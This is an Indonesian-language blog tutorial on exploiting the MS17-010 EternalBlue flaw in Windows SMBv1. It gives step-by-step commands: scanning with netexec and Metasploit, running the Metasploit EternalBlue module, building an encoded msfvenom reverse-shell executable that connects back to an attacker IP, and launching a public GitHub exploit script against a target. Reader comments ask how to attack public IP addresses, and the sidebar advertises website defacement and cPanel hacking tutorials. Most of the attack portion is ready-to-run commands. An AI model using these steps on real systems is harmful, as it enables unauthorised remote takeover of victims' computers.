• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Eksploitasi SMB Remote Code Execution MS17-010 Eternalblue

May 3, 2017 by Jack Wilder 20 Comments

Oke exploit ini sedang ramai dibicarakan akhir-akhir ini setelah grup Shadowbroker merilis tools private milik NSA. Jadi ternyata diam-diam NSA mengeksploitasi kerentanan di service SMB dan menyimpan exploit tersebut untuk keperluan spying. Exploit tersebut diberi nama Eternalblue.

Eternalblue

Eternalblue adalah sebuah exploit yang memanfaatkan celah keamanan, yang menargetkan kerentanan MS17-010 dalam protokol SMBv1. Exploit ini memungkinkan peretas untuk mengambil alih komputer dan menyebarkan malware. Eternalblue merupakan salah satu exploit paling berbahaya dalam sejarah karena memungkinkan peretas untuk menyerang jutaan komputer di seluruh dunia.

System yang Terdampak

Berikut list sistem operasi Windows yang terinfeksi:
  • Windows XP (all services pack) (x86) (x64)
  • Windows Server 2003 SP0 (x86)
  • Windows Server 2003 SP1/SP2 (x86)
  • Windows Server 2003 (x64)
  • Windows Vista (x86)
  • Windows Vista (x64)
  • Windows Server 2008 (x86)
  • Windows Server 2008 R2 (x86) (x64)
  • Windows 7 (all services pack) (x86) (x64)

Deteksi

Dari sudut pandang red-teamer atau pentester, deteksi awal dapat dilakukan menggunakan tools netexec atau modul metasploit. Oh iya, sebagai catatan tambahan, di tutorial ini target yang akan dieksploitasi beralamat di 10.10.82.157. Sehingga kalian bisa sesuaikan sendiri untuk alamat IP targetnya.

Menggunakan NetExec:

netexec smb 10.10.82.157 -u '' -p ''

Nah, dari output diatas terlihat bahwa target adalah Windows 7 Professional, dengan SMBv1 diaktifkan. Artinya target ini rentan.

Atau, cara kedua adalah menggunakan modul dari metasploit.

msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 10.10.82.157
run

Dari outputnya terlihat kalau target ini kemungkinan rentan terhadap serangan MS17-010 Eternalblue.

Eksploitasi

Oke dan untuk eksploitasinya, sebenarnya ada banyak tools di GitHub yang bisa digunakan. Atau bisa juga menggunakan modul Metasploit.

Menggunakan Metasploit:

use exploit/windows/smb/ms17_010_eternalblue
show options
set LHOST 10.4.33.242
set RHOSTS 10.10.82.157
run

10.4.33.242 sendiri adalah IP saya atau IP attacker. Jadi silahkan sesuaikan sendiri ya.

Atau, cara kedua, menggunakan tools dari:

  • https://github.com/helviojunior/MS17-010

Note: Jika kalian menggunakan Kali Linux ataupun OS terbaru dengan dukungan Python 2 yang sudah ditiadakan, jalankan perintah berikut untuk menambahkan dependensi (impacket module) ke Python 2 terlebih dahulu.

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
pip2 install pip install impacket==0.9.22

Selanjutnya, buat payload menggunakan msfvenom. Shell yang saya buat adalah shell non meterpreter, sehingga untuk back connectnya menggunakan netcat.

msfvenom -p windows/shell_reverse_tcp -f exe -o /tmp/shell.exe -a x86 -e x86/shikata_ga_nai LHOST=10.4.33.242 LPORT=4444

Lalu jalankan exploit Eternalblue menggunakan perintah:

git clone https://github.com/helviojunior/MS17-010
cd MS17-010
python2 send_and_execute.py 10.10.82.157 /tmp/shell.exe

Oke mungkin itu saja sharing kali ini. Silahkan tinggalkan komentar jika ada yang kurang jelas.

Filed Under: Metasploit, Windows Attack Tagged With: Exploit, Metasploit, Windows

Reader Interactions

Comments

  1. Wery Shanjaya says

    May 3, 2017 at 12:56 pm

    Mantavh…

    Reply
    • kenshusei says

      April 2, 2018 at 10:05 pm

      bagus mantaf boleh dicoba nie, sebagai mantan kenshusei jepang harus bisa dunk

      salam

      Reply
  2. Kost Putri Alsavega says

    May 3, 2017 at 2:53 pm

    Cacat wdhus pitu asu,…….

    Reply
    • chiaki says

      May 4, 2017 at 3:45 am

      wkwkwk

      Reply
  3. andi s says

    May 3, 2017 at 11:07 pm

    Maaf disini net framework buat apaan yah.?

    Reply
    • chiaki says

      May 4, 2017 at 3:44 am

      run eternalblue dari wine butuh net framework

      Reply
  4. Randy Clound says

    May 5, 2017 at 5:38 am

    bang apakah semua file yg ada di folder exploit eternalbluenya harus di pindahkan ke folder nya metasploit smb, atau hanya file ruby nya saja

    Reply
    • chiaki says

      May 9, 2017 at 7:05 pm

      file ruby nya aja.

      Reply
  5. CHALU BLACKHOLZ says

    May 14, 2017 at 4:42 pm

    Jossssss

    Reply
  6. organic-chemistry says

    May 16, 2017 at 10:03 am

    mengapa windows 8.1 dan windows 10 ga bisa? windows 7 pun harus menaklukan net framework 4.5.2 kalo mau exploit kwkwkwkwkwkw

    Reply
    • chiaki says

      May 16, 2017 at 2:26 pm

      maksudnya gimana. ini kan eksploitasi service smb v1. net framework diatas cuma sebagai pembuat payload nya aja.

      Reply
  7. street carder says

    May 17, 2017 at 5:16 am

    kalo nembaknya ip public gmn om? apa sama saja cuma ganti targetnya pk ip public? atau ada yg lainnya yg harus di setup?

    Reply
    • chiaki says

      May 24, 2017 at 7:43 pm

      port forwarding

      Reply
  8. CAMPUR CAMPUR says

    May 17, 2017 at 7:14 pm

    TUTOR GEBLEK CACAT ASUUUUUUUUUUUUUUUUUUUUUUU

    Reply
  9. Sillhouette says

    May 18, 2017 at 7:21 pm

    sudah terintegrasi dengan metasploit yak gans? kalo bisa mah coba exploit asli nya yang dari shadowbroker

    Reply
    • chiaki says

      May 24, 2017 at 7:41 pm

      itu file di github nya sambil di cek lah

      Reply
  10. Kabarterbaru.news says

    June 2, 2017 at 10:38 pm

    bang kalo kita eksekusi di ip dinamis bisa gak? ini gak kaya backconnect kan?

    Reply
    • chiaki says

      June 8, 2017 at 4:31 am

      kalo targetnya diluar jaringan ya harus publik aja ip nya. sama aja kayak back connect

      Reply
      • Anton says

        April 8, 2019 at 12:45 am

        Bisa diperjelas gan bc pk ip dinamis nya? Misal pakai indihome atau modem 3g ane koq failed to bind terus ke local portnya and Kalo payloads ya diganti exec cmd rubynya socket error terus…udah coba test di www? Maksudnya bukan offline dilocalhost gt

        Reply

Trackbacks

  1. SMB Remote Code Execution (MS17-010) Eternalblue and Doublepulsar Exploit – Black Illusion Security says:
    September 27, 2018 at 11:07 am

    […] Content retrieved from: https://exploit.linuxsec.org/eternalblue-doublepulsar-exploi/. […]

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tool Deface Opencart Bruteforce and Upload Image

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Cara Mudah Hack cPanel dengan Fitur Reset Password

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

Surge.sh Custom Domain or Subdomain Takeover

Azure Traffic Manager Custom Domain or Subdomain Takeover

LinuxSec / 20 queries in 0.12 seconds